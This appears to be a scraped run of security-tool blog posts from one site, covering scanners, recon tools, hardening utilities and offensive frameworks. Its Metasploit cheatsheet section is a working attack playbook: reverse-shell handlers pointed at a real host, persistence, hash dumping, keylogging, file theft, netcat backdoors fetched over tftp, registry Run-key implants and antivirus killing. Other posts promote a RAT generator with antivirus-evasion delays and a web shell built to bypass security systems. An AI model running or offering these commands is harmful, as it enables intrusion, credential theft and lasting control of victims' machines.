• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Upgrade note

Lynis 2.5.2 (2017-07-10)
▼Advertisements

Changes:
--------
- Support for PHP on CloudLinux
- Check for presence of locale binary
- Suhosin detection improvements
- Generic code improvements
- Changed 'lynis audit system remote' routine
- Support for macOS High Sierra
- French translation updated

Lynis Enterprise:
-----------------
- Allow 'tags' and 'system-customer-name' to be specified via Lynis client

Tests:
------
* CONT-8102 - Check for dockerd instead of docker -d
* FIRE-4594 - Check for presence Advanced Policy Firewall (APF)
* PKGS-2379 - New test for PHP suhosin extension status
* PKGS-7370 - Only use debsums on Debian
* KRNL-6000 - Added kernel.dmesg_restrict testing

The post Lynis 2.5.2 – Security Auditing Tool for Unix/Linux Systems appeared first on DigitalMunition.

Handy tool for shellcode analysis.
Demo video

Requirements

• objdump

Installation and execution
Then you can download smap by cloning the Git repository:

git clone https://github.com/suraj-root/smap.git
cd smap/
python smap.py -h

get shellcodes @ http://shell-storm.org/shellcode/, https://www.exploit-db.com/shellcode/,https://packetstormsecurity.com/files/tags/shellcode/
For educational purposes only.

The post smap – Shellcode Mapper appeared first on DigitalMunition.

• Windows Remote Control
• Download File
• Upload File
• Persistence
• Open Url Remotely
• Get Operating System Name
• Run Fork Bomb

TESTED ON
Kali Linux – ROLLING EDITION

USAGE
You need Golang and UPX package installed!

Install Prerequisites

# apt install golang upx-ucl -y

Cloning

git clone https://github.com/tiagorlampert/CHAOS.git

Running

cd CHAOS
go run CHAOS.go

Note: CHAOS has a delay of 70 seconds to bypass most of the antivirus and sandboxes.

VIDEO DEMONSTRATION

Don’t submit to VirusTotal or other scanning service. :3

The post CHAOS Framework – Generate Payloads and Control Remote Machines appeared first on DigitalMunition.

dork-cli is a Python-based command-line Google Dork Tool to perform searches againsts Google’s custom search engine. A command-line option is always good as it allows you to script it in as part of your automated pen-testing suite.

It will return a list of all the unique page results it finds, optionally filtered by a set of dynamic page extensions.

Any number of additional query terms/dorks can be specified. dork-cli was designed to be piped into an external tool such as a vulnerability scanner for automated testing purposes.

Setup

In order to use this program you need to configure at a minimum two settings: a Google API key and a custom search engine id.

Custom Search Engine:

• Create a custom search engine via https://www.google.com/cse/
• Add your desired domain(s) under “Sites to search”
• Click “Search engine ID” button to reveal the id, or grab it from the “cx” url paramter

API key:

• Open the Google API console at https://code.google.com/apis/console
• Enable the Custom Search API via APIs & auth > APIs
• Create a new API key via APIs & auth > Credentials > Create new Key
• Select “Browser key”, leave HTTP Referer blank and click Create

Usage

API Limitations

The free Google API limits you to 100 searches per day, with a maximum of 10 results per search. This means if you configure dork-cli.py to return 100 results, it will issue 10 queries (1/10th of your daily limit) each time it is run. You have the option to pay for additional searches via the Google API console. At the time of writing, signing up for billing on the Google API site gets you $300 free to spend on API calls for 60 days.

You can download dork-cli here:

dork-cli.py

Or read more here.

The post dork-cli – Command-line Google Dork Tool appeared first on DigitalMunition.

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases.

1. Misconfigured DNS scan using DNSDumpster.com.
2. Scan the Crimeflare.com database.
3. Bruteforce scan over 2500 subdomains.

Please feel free to contribute to this project. If you have an idea or improvement issue a pull request!

Disclaimer
This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to setup CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool.

Usage
To run a scan against a target:

python cloudfail.py --target seo.com

To run a scan against a target using Tor:

service tor start

(or if you are using Windows or Mac install vidalia or just run the Tor browser)

python cloudfail.py --target seo.com --tor

Dependencies
Python3

• argparse
• colorama
• socket
• binascii
• datetime
• requests
• win_inet_pton

The post CloudFail – Utilize misconfigured DNS and old database records to find hidden IP’s behind the CloudFlare network appeared first on DigitalMunition.

Bluto is a Python-based tool for DNS recon, DNS zone transfer testing, DNS wild card checks, DNS brute forcing, e-mail enumeration and more.

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will attempt to identify if SubDomain Wild Cards are being used.

If they are not Bluto will brute force sub-domains using parallel sub processing on the top 20000 of the ‘The Alexa Top 1 Million subdomains’ If Wild Cards are in place, Bluto will still Brute Force SubDomains but using a different technique which takes roughly 4 x longer.

NetCraft results are then presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Extra Features

Bluto now does email address enumeration based on the target domain, currently using Bing and Google search engines plus gathering data from the Email Hunter service and LinkedIn.https://haveibeenpwned.com/ is then used to identify if any email addresses have been compromised. Previously Bluto produced an ‘Evidence Report’ on the screen, this has now been moved off screen and into an HTML report.

Search engine queries are configured in such a way to use a random User Agent: on each request and does a country look up to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas, however, excessive lookups will result in captchas (Bluto will warn you if any are identified).

Usage

You can download Bluto here:

Bluto-2.01.zip

Or read more here.

The post Bluto – DNS Recon, Zone Transfer & Brute Forcer appeared first on DigitalMunition.

Cheat sheet of Metasploit… Commands are as follows..

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

# shows all the scripts
run

# persistence! broken …if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30

run get_pidgin_creds

idletime
sysinfo

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

# session hijack tokens
use incognito
impersonate_token “NT AUTHORITY\\SYSTEM”

# escalate to system
use priv
getsystem

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

# list top used apps
run prefetchtool -x 20

# list installed apps
run prefetchtool -p

run get_local_subnets

# find and download files
run search_dwld “%USERPROFILE%\\my documents” passwd
run search_dwld “%USERPROFILE%\\desktop passwd
run search_dwld “%USERPROFILE%\\my documents” office
run search_dwld “%USERPROFILE%\\desktop” office

# alternate
download -r “%USERPROFILE%\\desktop” ~/
download -r “%USERPROFILE%\\my documents” ~/

# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc
run winenum

# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4
run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

# vnc / port fwd for linux
run vnc

# priv esc
run kitrap0d

run getgui

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\”

getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787

run msf_bind
run msf_bind -p 1975
rev2self
getuid

getuid

enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

# Windows Login Brute Force Meterpreter Script
run winbf -h

# upload a script or executable and run it
uploadexec

# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d “c:\windows\system32\metabkdr.exe” /f
at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”
SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL /TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory still … Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy

The post Metasploit Cheatsheet appeared first on DigitalMunition.

Eternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144.

Requirements

• masscan
• metasploit-framework

How to Install

• git clone https://github.com/peterpt/eternal_scanner.git
• cd eternal_scanner && ./escan
• OR ./escan -h (to change scanner speed)

Install Requirements

• apt-get install masscan metasploit-framework

Screenshots

The post Eternal – An internet scanner for Eternal Blue [exploit CVE-2017-0144] appeared first on DigitalMunition.

• It does NOT prevent software from being exploited.
• It does NOT prevent the abuse of every available risky feature.
• It is NOT an Antivirus. It does not protect your computer. It doesn’t identify, block, or remove any malware.
• It does NOT prevent the changes it implements from being reverted. If malicious code runs on the system and it is able to restore them, the premise of the tool is defeated, isn’t it?

• Disable Windows Script Host. Windows Script Host allows the execution of VBScript and Javascript files on Windows operating systems. This is very commonly used by regular malware (such as ransomware) as well as targeted malware.
• Disabling AutoRun and AutoPlay. Disables AutoRun / AutoPlay for all devices. For example, this should prevent applicatons from automatically executing when you plug a USB stick into your computer.
• Disables powershell.exe, powershell_ise.exe and cmd.exe execution via Windows Explorer. You will not be able to use the terminal and it should prevent the use of PowerShell by malicious code trying to infect the system.
• Sets User Account Control (UAC) to always ask for permission (even on configuration changes only) and to use “secure desktop”.
• Disable file extensions mainly used for malicious purposes. Disables the “.hta”, “.js”, “.JSE”, “.WSH”, “.WSF”, “.scr”, “.vbs” and “.pif” file extensions for the current user (and for system wide defaults, which is only relevant for newly created users).

• Disable Macros. Macros are at times used by Microsoft Office users to script and automate certain activities, especially calculations with Microsoft Excel. However, macros are currently a security plague, and they are widely used as a vehicle for compromise. With Hardentools, macros are disabled and the “Enable this Content” notification is disabled too, to prevent users from being tricked.
• Disable OLE object execution. Microsoft Office applications are able to embed so called “OLE objects” and execute them, at times also automatically (for example through PowerPoint animations). Windows executables, such as spyware, can also be embedded and executed as an object. This is also a security disaster which we observed used time and time again, particularly in attacks against activists in repressed regions. Hardentools entirely disables this functionality.
• Disabling ActiveX. Disables ActiveX Controls for all Office applications.

• Disable JavaScript in PDF documents. Acrobat Reader allows to execute JavaScript code from within PDF documents. This is widely abused for exploitation and malicious activity.
• Disable execution of objects embedded in PDF documents. Acrobat Reader also allows to execute embedded objects by opening them. This would normally raise a security alert, but given that legitimate uses of this are rare and limited, Hardentools disables this.

The post Hardentools – Utility that disables a number of risky Windows features appeared first on DigitalMunition.

Requirements

Web Console

• sudo pip install mysql-connector
• sudo pip install jinja2
• sudo pip install bleach

Scanner

• sudo apt-get install python-pip python-dev libmysqlclient-dev
• sudo pip install requests
• sudo pip install MySQL-python
• sudo pip install -U selenium
• sudo apt-get install libfontconfig

Proxy

• sudo apt-get install python-pip python-dev libmysqlclient-dev
• sudo pip install MySQL-python

Installation & Configuration

Database

• Install MySQL and create a db user and password, e.g. root/toor
• Create database for NagaScan by using command source schema.sql

Web Console

• Modify www/config_override.py with your own DB configuration for Web console

configs = {
    'db': {
        'host': '127.0.0.1',
        'user': 'root',
        'password': 'toor'
    }
}

• Run sudo python www/wsgiapp.py to start Web console

Scanner

• Modify scanner/lib/db_operation.py with your own DB configuration for Scanner

def db_conn():
    try:
        user = "root"
        pwd = "toor"
        hostname = "127.0.0.1"

• Install PhantomJs
  • Linux 64-bit:
    • wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2
    • tar -jxvf phantomjs-2.1.1-linux-x86_64.tar.bz2
  • Linux 32-bit:
    • wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-i686.tar.bz2
    • tar -jxvf phantomjs-2.1.1-linux-i686.tar.bz2
• Modify scanner/lib/hack_requests.py in line 28 as below

self.executable_path='[Your Own Phantomjs Binary Path]' # e.g. /home/ubuntu/phantomjs-2.1.1-linux-x86_64/bin/phantomjs

• Run below commands to start Scanner
  • python scanner/scan_fi.py to scan File Inclusion
  • python scanner/scan_xss.py to scan XSS
  • python scanner/scan_sqli.py to scan SQL injection

Proxy & Parser

• Install MitmProxy
  • Ubuntu 16.04 (Preferred):
    • sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
    • sudo pip3 install mitmproxy
  • Ubuntu 14.04:
    • sudo apt-get install python-pip python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
    • sudo pip install “mitmproxy==0.18.2”
  • MacOS:
    • brew install python3
    • brew install mitmproxy
• Run mitmdump -p 443 -s "proxy/proxy_mitmproxy.py /tmp/logs.txt" to start Proxy
• Modify parser/lib/db_operation.py with your own DB configuration for Parser

def db_conn():
    try:
        user = "root"
        pwd = "toor"
        hostname = "127.0.0.1"

• Run python parser/parser_mitmproxy.py /tmp/logs.txt to start Parser

Usage

• Access to Web Console with the default username and password (nagascan@example.com/Naga5c@n) to config exclusions and add SQLMAP server

• Install MitmProxy certificates for Browser or Mobile per Instruction
• Add a proxy you created in your Web Browser or Mobile Wi-Fi
• Just browse websites from Browser or use APPs from Mobile whatever you like
• Have fun!

The post NagaScan – Distributed Passive Scanner for Web Application appeared first on DigitalMunition.

Recon Dog is an all in one tool for all your basic information gathering needs. It uses APIs to gather all the information so your identity is not exposed.
Downloading and running Recon Dog

Enter the following command in the terminal to download it

git clone https://github.com/UltimateHackers/ReconDog

After downloading the program, enter the following command to navigate to the Recon Dog directory and listing the contents

cd ReconDog && ls

Now run the script with following command.

python dog.py

The post ReconDog – An All In One Tool For All Your Basic Information Gathering Needs appeared first on DigitalMunition.

CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Every effort has been made to structure the code in a readable and extendable format, however it should be noted that the analyst is not a professional developer.

Features

• Drag and drop
  • Operations can be dragged in and out of the recipe list, or reorganised.
  • Files can be dragged over the input box to load them directly.
• Auto Bake
  • Whenever you modify the input or the recipe, CyberChef will automatically “bake” for you and produce the output immediately.
  • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
  • If any bake takes longer than 200 milliseconds, auto bake will be switched off automatically to prevent further performance issues.
• Breakpoints
  • You can set breakpoints on any operation in your recipe to pause execution before running it.
  • You can also step through the recipe one operation at a time to see what the data looks like at each stage.

• Save and load recipes
  • If you come up with an awesome recipe that you know you’ll want to use again, just click save and add it to your local storage. It’ll be waiting for you next time you visit CyberChef.
  • You can also copy a URL which includes your recipe and input which can be shared with others.
• Search
  • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
• Highlighting
  • When you highlight text in the input or output, the offset and length values will be displayed and, if possible, the corresponding data will be highlighted in the output or input respectively
• Save to file and load from file
  • You can save the output to a file at any time or load a file by dragging and dropping it into the input field (note that files larger than about 500kb may cause your browser to hang or even crash due to the way that browsers handle large amounts of textual data).
• CyberChef is entirely client-side
  • It should be noted that none of your input or recipe configuration is ever sent to the CyberChef web server – all processing is carried out within your browser, on your own computer.
  • Due to this feature, CyberChef can be compiled into a single HTML file. You can download this file and drop it into a virtual machine, share it with other people, or use it independently on your desktop.

Browser support

CyberChef is built to support

• Google Chrome 40+
• Mozilla Firefox 35+
• Microsoft Edge 14+

You can find a live demo here: CyberChef

You can download CyberChef here:

CyberChef-v5.12.0.zip

Or read more here.

The post CyberChef – Cyber Swiss Army Knife appeared first on DigitalMunition.

nforfinder is a tool made to collect information of any domain pointing at a server (ip,domain,range,file).
Requires python libs: pyRequests and pyDNS
-First, you need to install complementary libraries:

user@machine$ sudo apt-get install python-dns python-dnspython python-requests python-lxml python

OR

pip install  pydns
pip install requests --upgrade
pip install  lxml

-Then Download “inforfinder”
-The next step is to run “inforfinder.py”: python inforfinder.py –help
Find more information on how to use this app:

 InforFinder v1.0.9 Powered By GGUsoft 2017

 Powered By GGUsoft 2017

 Commands:

 -d <dominio>    Gets a domain for apply any optional commands

 -dD <dominio>    Gets a domain list hosted in IP of the specified domain

 -dI <IP>    Gets a domain list hosted in the specified IP

 -dR <IP inicio> <IP fin>  Gets a domain list hosted in every IP of the specified range

 -dF <file>    Gets a list with all domains hosted at same IP from a file, the file contens a IP by line
▼Advertisements


 Optionals:

 inforfinder <command> -cms   Checks if every domain found has a cms website (wordpress, joomla ,etc) and show version

 inforfinder <command> -servinfo  Checks web server parameters

 inforfinder <command> --subdomain-enum          Lists subdomains of every domain found

The post inforfinder – Tool To Collect Information Of Any Domains Pointing At Some Server (Ip, Domain, Range, File) appeared first on DigitalMunition.

• Perform their web services security analysis at once
• See overall security assessment with reports
• Harden their web services

• Insecure Communication – SSL Not Used
• Unauthenticated Service Method
• Error Based SQL Injection
• Cross Site Scripting
• XML Bomb
• External Entity Attack – XXE
• XPATH Injection
• Verbose SOAP Fault Message

• Weak XML Schema: Unbounded Occurrences
• Weak XML Schema: Undefined Namespace
• Weak WS-SecurityPolicy: Insecure Transport
• Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
• Weak WS-SecurityPolicy: Tokens Not Protected

• Server or technology information disclosure

• Parser
• Vulnerabilities Loader
• Analyzer/Attacker
• Logger
• Report Generator

The post WSSAT – Web Service Security Assessment Tool appeared first on DigitalMunition.

There’s multiple things that makes DAws better than every Web Shell out there:

1. Bypasses Security Systems(IPS, WAFs,etc) like Suhosin(uses up to 20 php functions just to get a command executed).
2. Drops CGI Shells and communicate with them to bypass Security Systems.
3. Uses the SSH Authorized Keys method to bypass Security Systems.
4. Uses Shellshock in 2 methods to bypass Security Systems.
5. Is completely Post Based and uses a XOR Encryption based on a random key that gets generated with every new session + private base64 functions to bypass Security Systems.
6. Supports Windows and Linux.
7. Finds a writeable and readable directory and moves there if it’s a web directory; DAws will output everything in that found directory.
8. Drops a php.ini and a .htaccess file that clears all disablers incase “suphp” was installed.
9. Has an advanced File Manager.
10. Everything is done automatically so there’s nothing for the user to worry about.
11. Open Source.
12. and much more (check the source for more information; everything is well commented)

Credits:

• dotcppfile

The post DAws – Advanced Web Shell appeared first on DigitalMunition.

Screenshots

To Use
To clone and run this repository you’ll need Git and Node.js installed on your computer. To download and install the app, type the following in your terminal:

# Clone this repository
git clone https://github.com/Or3stis/apparatus.git
# Go into the repository
cd apparatus
# Install dependencies
npm install
# to run the app
npm start
▼Advertisements

Because the app is still in prototype stage, it is best to keep up to date with the most recent commits. To do so, before starting the app, type:

# inside the apparatus directory

# update to latest
git pull

The first window (home screen) will ask you to choose which modeling phase would you like to perform analysis in. After you select a phase, a native dialog window will be displayed and ask you choose a file to load. By default, you can only choose .js or.json files.
You will find some example graphs in the graphs folder.

The post ASTo – An IoT Network Security Analysis Tool and Visualizer appeared first on DigitalMunition.

EvilAbigail is a Python-based tool that allows you run an automated Evil Maid attack on Linux systems, this is the Initrd encrypted root fs attack. An Evil Maid attack is a type of attack that targets a computer device that has been shut down and left unattended.

An Evil Maid attack is characterized by the attacker’s ability to physically access the target multiple times without the owner’s knowledge.

Scenarios

• Laptop left turned off with FDE turned on
• Attacker boots from USB/CD/Network
• Script executes and backdoors initrd
• User returns to laptop, boots as normal
• Backdoored initrd loads:
  • (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
  • (Fedora/CentOS) LD_PRELOAD .so into DefaultEnviroment, loaded globally, dropping a shell.

Supported Distros

• Ubuntu 14.04.3
• Debian 8.2.0
• Kali 2.0
• Fedora 23
• CentOS 7

You can download EvilAbigail here:

EvilAbigail-master.zip

Or read more here.

The post EvilAbigail – Automated Evil Maid Attack For Linux appeared first on DigitalMunition.

A tool that enumerates Android devices for information useful in understanding its internals and for exploit development. It supports android 4.2 to android 7.1.1
Requirements

• The most current ADB must be in your path and fully functional
• The report name must not have any whitespace

Limitations

• Some information and files cannot be pulled higher up the SDK version due to strict SELinux policies and android hardening.
• It can only run on one device at a time for now

To Do

• Support for enumeration on a rooted device
• Support enumeration on multiple devices at a time
• Generate PDF report on the enumartuon data

Inspired by

• LinEnum – https://github.com/rebootuser/LinEnum
• Linuxprivchecker – https://www.securitysift.com/download/linuxprivchecker.py
• Unix-privesc-check – https://github.com/inquisb/unix-privesc-check
• Basic Linux Privilege Escalation – https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

The post Twiga – A Tool That Enumerates Android Devices For Information Useful In Understanding Its Internals And For Exploit Development appeared first on DigitalMunition.

Deployment
Vulnreport is a Ruby web application (Sinatra/Rack stack) backed by a PostgreSQL database with a Redis cache layer.
Vulnreport can be installed on a local VM or server behind something like nginx, or can be deployed to Heroku.

Local Deploy / Your own server
To deploy locally, you’ll need to make sure you have installed the dependencies:

• Ruby >= 2.1
• PostgreSQL
• Redis
• Rollbar
• Bundler

Clone the repo and open up the .env file, updating it as necessary. The run bundle install. You’ll probably want to modifystart.sh to make it work for your environment – the one included in the repo is intended to be used for local use during debugging/development.
You should also create a .env file based on .env.example, or set the same ENV variables defined in .env in your environment.

Heroku Deploy

Automatic Deployment

You can automatically deploy to Heroku. After doing so, follow the instructions below to login to Vulnreport and finish configuration.

Manual Deployment
To deploy to Heroku (assuming you have created a Heroku app and have the toolbelt installed)

git clone [Vulnreport repo url]

heroku git:remote -a [Heroku app name]

heroku addons:create heroku-postgresql:hobby-dev
heroku addons:create heroku-redis:hobby-dev
heroku addons:create rollbar:free
heroku addons:create sendgrid:starter

You’ll then want to open up the .env file and copy the keys/values (updating values where necessary) to the Heroku settings for your app. This can also be done via the toolbelt CLI commands. Note that the default ENV variables after running the addons should be fine, but you can double check. You’ll definitely want to update VR_SESSION_SECRET. If this isn’t your production install, you should change RACK_ENV to development.

heroku config:set VR_SESSION_SECRET=abc123456
heroku config:set RACK_ENV=production

git push heroku master

You can now follow the instructions for installation as you would if you were running Vulnreport locally.

Installation
To handle the initial configuration for Vulnreport, run the SEED.rb script. If you are deploying on Heroku, run this via heroku run ./SEED.rb.
If you used the automated ‘Deploy to Heroku’ feature, this step should have been handled for you automatically.

Running ./SEED.rb on ⏢ vulnreport-test... up, run.8035

Vulnreport 3.0.0.alpha seed script
WARNING: This script should be run ONCE immediately after deploying and then DELETED

Setting up Vulnreport now...

Setting up the PostgreSQL database...
 Done

Seeding the database...
 Done

User ID 1 created for you


ALL DONE! :)
Login to Vulnreport now and go through the rest of the settings!

Now, delete the SEED.rb file.
The default admin user has been created for you with username admin and password admin. This should be immediately rotated and/or SSO should be configured.
At this point you should go to your Vulnreport URL (e.g. https://my-vr-test.herokuapp.com above) and login with the user created. Go through the Vulnreport and user settings to configure your instance of Vulnreport.

Pentest!
You’re ready to go – for documentation about how to use your newly-installed Vulnreport instance, see the full docs athttp://vulnreport.io/documentation

Custom Interfaces and Integrations
Vulnreport is designed and intended to be used with external systems. For more information about how to implement the interfaces that allow for integration/synchronization with external systems please see the custom interfaces documentation athttp://vulnreport.io/documentation#interfaces.

Code Documentation
To generate the documentation for the code, simply run Yard:

yard doc
yard server

A Note on XML Import/Export
Currently, Vulnreport supports an XML format to import Vulns to a specific Test. This is useful if you want Vulnreport to be on a different network than you do your pentests on and thus are using a different client to record findings while you actively pentest, but relies on being configured for your specific Vulnreport instance and Vulntypes configuration.
We’re working on supporting a few other types of XML import (ZAP and Burp, for instance) as well as allowing arbitrary XML export/import between Vulnreport instances. Stay tuned as we hope to push these features soon.

The XML format Vulnreport currently supports is:

<?xml version="1.0" encoding="UTF-8"?>

<Test xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Vuln>
    <Type>[Vulntype ID]</Type>
    <File>[File Vuln Data]</File>
    <Code>
      [Code Vuln Data]
    </Code>
    <File>clsSyncLog.cls</File>
    <Code>
      hello world
    </Code>
    ...etc...
  </Vuln>

  <Vuln>
    <Type>6</Type>
    <File>clsSyncLog.cls</File>
    <File>CommonFunction.cls</File>
    <Code>
      12 Public Class CommonFunction{
    </Code>
  </Vuln>
</Test>

<?xml version="1.0" encoding="UTF-8"?>

<Test xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"">
  <Vuln>
    <Type>REQUIRED - EXACTLY 1 - INTEGER - ID of VulnType. 0 = Custom</Type>
    <CustomTypeName>OPTIONAL - EXACTLY 1 - STRING if TYPE == 0</CustomTypeName>
    <BurpData>OPTIONAL - UNLIMITED - STRING - Burp req/resp data encoded in our protocol</BurpData>
    <URL>OPTIONAL - UNLIMITED - STRING - URL for finding</URL>
    <FileName>OPTIONAL - UNLIMITED - STRING - Name/path of file for finding</FileName>
    <Output>OPTIONAL - UNLIMITED - STRING - Output details</Output>
    <Code>OPTIONAL - UNLIMITED - STRING - Code details</Code>
    <Notes>OPTIONAL - UNLIMITED - STRING - Notes for vuln</Notes>
    <Screenshot>
      OPTIONAL - UNLIMITED - Screenshots of vuln
      <Filename>REQUIRED - EXACTLY 1 - STRING - Filename with extension</Filename>
      <ImageData>
        REQUIRED - EXACTLY 1 - BASE64 - Screenshot data
      </ImageData>
    </Screenshot>
  </Vuln>

  ....unlimited vulns....

  <Vuln>
  </Vuln>
</Test>

The post Vulnreport – Pentesting Management And Automation Platform appeared first on DigitalMunition.

Tool to automatic leak information using Hacking with engine searches.
How to install
Install requirements with:

pip install -r requirements.txt

How to use:

python rastleak.py

Usage:

$ python rastleak.py -h
usage: rastleak.py [-h] -d DOMAIN -o OPTION -n SEARCH -e EXT [-f EXPORT]

This script searchs files indexed in the main searches of a domain to detect a possible leak information

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        The domain which it wants to search
  -o OPTION, --option OPTION
                        Indicate the option of search
                                1.Searching leak information into the target
                                2.Searching leak information outside target
  -n SEARCH, --search SEARCH
                        Indicate the number of the search which you want to do
  -e EXT, --ext EXT     Indicate the option of display:
                                1-Searching the domains where these files are found
                                2-Searching ofimatic files

  -f EXPORT, --export EXPORT
                        Indicate the type of format to export results.
                                1.json (by default)
                                2.xlsx

The post RastLeak – Tool To Automatic Leak Information Using Hacking With Engine Searches appeared first on DigitalMunition.